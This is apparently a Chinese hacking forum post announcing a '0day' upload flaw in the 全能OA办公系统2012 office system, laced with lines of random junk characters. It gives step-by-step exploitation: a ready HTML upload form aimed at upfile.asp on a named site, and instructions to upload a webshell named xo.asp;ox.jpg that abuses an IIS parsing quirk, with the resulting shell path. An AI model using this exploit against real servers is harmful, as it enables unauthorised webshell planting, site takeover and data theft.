全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

/ H% I" V7 d* z6 `! ^主要功能：
公司通告
6 @# W# t& h( i* o工作计划
9 ]; t2 \% [- c" W- `通讯助理
客户资源
我的公文
1 g, D# F3 d. ]" c公文传阅
公共资源
8 g4 X" k1 Y( r- X: \资源预约
今日考勤
3 t- t3 X/ f; m5 m9 i, T1 Z个人计划
( V( ~; f, r- N* C2 b6 {个人通讯录
个人基本档案
: u& w% N6 K3 `  s6 Q未读邮件
发邮件
收件夹
: p8 E2 A+ K& x" p# y寄件夹
" x  {. S( K9 o: t' b网络硬盘
网络会议
4 y& ]% P+ {* D: ]' `* i5 R网络调查
交流论坛

有兴趣测试的朋友可以下源码看看
( L, K. s) `# g4 n4 u2 l
源码下载：
: H0 s' }2 q0 h" o) {
+ R6 ]6 A7 f. n* A: j0 L9 T2 \( Q8 Dhttp://www.mycodes.net/30/4750.htm

漏洞介绍：

由upfile.asp上传文件漏洞引起
# g" K4 P8 A1 G
测试方法：

% y% Z& f- h$ z! e# u+ O. _使用名小子上传http://www.itlynn.com/upfile.asp即可
8 M. h' T) p' w$ w
如果upfile.asp文件被删除不存在。
; m& m* S" ]) }1 c' u9 J
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
5 I$ I8 C3 h3 M* r* f3 f
# z: R. t' @' }- ]: I5 c如果存在那么将如下代码保存为upfile.html。

5 e' O% U# u( S9 N( \然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
1 e. G! d9 v/ G' j1 k


& R2 @' `$ {9 t$ j01 <table border='0' align="center" cellpadding="5">

$ |2 Q) ?6 W7 M+ }: b. o4 z02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

$ a* f+ d, U" [! N+ E9 X! T# ?7 l5 ^03 <tr>

% [, y  \3 r) U* y7 ?# u04             <td>报错：</td>
3 Z' P0 I( Q1 R. D  D
. _0 \9 H. F; z9 P9 F- u6 U1 d05             <td><input type='radio' name='errnumber' value='0'>
8 M% _5 U+ _2 N( i0 L% N, ^  ?
06               自动更名
3 [3 a/ m8 g; v& L3 d% c
# s7 Q2 K+ f  _07               <input type='radio' name='errnumber' value='1' checked>
; Y2 |) K7 z. }; ^6 J9 j
0 R" `' i. \. o% f3 K8 c6 U08               报错方式
+ m% P+ H+ ?& f& c3 E. \8 i# f
09               <input type='radio' name='errnumber' value='2'>
& M; I/ V  L7 A  X- U( Q6 k
10               直接覆盖</td>

11           </tr>
% h# k+ a; q! ~' w  L3 {0 r4 y  b0 R; f
12           <tr>

; O3 f2 b$ G$ ]* e( d* S13             <td>主题：</td>

# ^4 X0 X  a# z0 z14             <td><input type='text' name='filename' size='30'></td>

- X; o) O- H% u  M# w% E15           </tr>
7 K/ t$ \! g4 X- m
16           <tr>
; h2 d/ ^2 e" v* ^5 e4 J& p
17             <td>文件：</td>
! c( d( D5 O6 f+ Y) t2 ?: |' J
, P/ Q7 S& w: v' g! |18             <td><input type="file"name="fruit"size="30"></td>

1 M7 L/ y! V/ a4 q- [+ H+ E+ Q: V* p19           </tr>

20           <tr>
1 q% n( i  g! l
1 l( {* F/ ]* V21             <td valign='top'>简介：</td>
1 O2 s; ?7 Y9 R; E8 V% F0 I" O# W) D
4 `5 W8 l, |$ Z0 l& O; q' l' p; \3 P22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

5 N7 r$ c1 W) p( k; h  v% c23           </tr>

5 F7 ~+ s- P: G24   
! M1 N8 {" T+ h% G) Y$ D( o+ {- E
  A' w' Q* y4 o, T0 d  p25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

" }3 y$ Z5 l9 r26           </tr>

27         </form>
! D: G( w1 v$ Y" q3 i' `
5 W" A1 e1 v) c6 R  ~然后打开上传一个文件名为xo.asp;ox.jpg的文件。
6 e: C' {& C9 F

/ W5 b* m6 p8 R0 C! Q1 Y  @; d
: k3 p8 K! E: O  k# }( Z% {  j上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

: C7 i6 ?2 n( j/ s此漏洞需要配合解析漏洞利用。
( J( o9 r* D& {4 W! z